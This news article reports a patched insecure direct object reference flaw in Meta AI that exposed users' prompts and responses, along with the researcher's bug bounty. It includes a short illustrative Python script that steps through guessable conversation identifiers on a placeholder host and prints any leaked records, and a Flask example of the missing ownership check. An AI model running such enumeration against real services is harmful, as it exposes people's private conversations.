Meta patches worrying security bug which could have exposed user AI prompts and responses - and pays the bug hunter $10,000
Security researcher flagged a way to read other people's prompts and responses

- Meta AI was assigning unique identifiers to prompts and responses
- The servers were not checking who had access rights to these identifiers
- The vulnerability was fixed in late January 2025
A bug which could have exposed users' prompts and AI responses on Meta's artificial intelligence platform has been patched.
The bug stemmed from the way Meta AI assigned identifiers to both prompts and responses.
When a logged-in user edits a previous prompt to get a different response, Meta assigns both the prompt and the response a unique identifier. By changing that number in a request, an attacker could get Meta's servers to return someone else's queries and results.
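Exploiting a flaw like this takes little more than a script. The sketch below is purely illustrative: the endpoint, session cookie, and identifier range are assumptions, not Meta's actual API. It shows how an attacker could walk through guessable identifiers and collect whatever an unpatched server hands back.

```python
import requests

# Hypothetical IDOR probe. The endpoint, session cookie, and ID range
# are illustrative assumptions, not Meta's real API.
BASE_URL = "https://ai.example.com/api/conversation"
COOKIES = {"session": "attacker-owned-valid-session"}

def probe(ident: int):
    """Fetch the prompt/response pair stored under a numeric identifier."""
    resp = requests.get(f"{BASE_URL}/{ident}", cookies=COOKIES, timeout=10)
    return resp.json() if resp.status_code == 200 else None

# If the identifiers are easy to guess (e.g. sequential), simply walking
# a numeric range would surface other users' conversations.
for ident in range(100_000, 100_100):
    leaked = probe(ident)
    if leaked:
        print(ident, leaked)
```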
No abuse so far
The bug was discovered by security researcher and AppSecure founder Sandeep Hodkasia in late December 2024. He reported it to Meta, which deployed a fix on January 24, 2025, and paid out a $10,000 bounty for his troubles.
Hodkasia said the prompt numbers Meta's servers were generating were easy to guess, yet apparently no threat actor exploited this before it was addressed.
In other words, Meta's servers weren't checking whether the user requesting a given identifier was actually authorized to view its contents, a classic insecure direct object reference (IDOR) flaw.
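The fix for this class of bug is conceptually simple: check ownership before returning the record. Here is a minimal sketch of a handler with the missing check added, assuming a hypothetical Flask service with made-up route and field names, not Meta's actual code:

```python
from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "dev-only-secret"  # required for Flask sessions

# Stand-in for a conversation store; keys play the role of the
# unique identifiers assigned to prompt/response pairs.
CONVERSATIONS = {
    101: {"owner": "alice", "prompt": "...", "response": "..."},
    102: {"owner": "bob", "prompt": "...", "response": "..."},
}

@app.route("/api/conversation/<int:ident>")
def get_conversation(ident):
    convo = CONVERSATIONS.get(ident)
    if convo is None:
        abort(404)
    # The authorization step that was missing: verify that the
    # logged-in user actually owns this record. Without it, any
    # authenticated user can read any identifier they can guess.
    if convo["owner"] != session.get("user"):
        abort(403)
    return jsonify(convo)
```

As a side note, many services return a 404 rather than a 403 for records the caller doesn't own, since that avoids confirming that a given identifier exists at all.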
This is clearly problematic in a number of ways, the most obvious one being that many people share sensitive information with chatbots these days.
Business documents, contracts, reports, and personal information all get uploaded to LLMs every day, and in many cases people use AI tools as psychotherapists, sharing intimate life details and private revelations.
This information can be abused, among other things, in highly customized phishing attacks that could lead to infostealer deployment, identity theft, or even ransomware.
For example, if a threat actor knows that a person was prompting the AI for cheap VPN solutions, they could send them an email offering a great, cost-effective product that is nothing more than a backdoor.
Via TechCrunch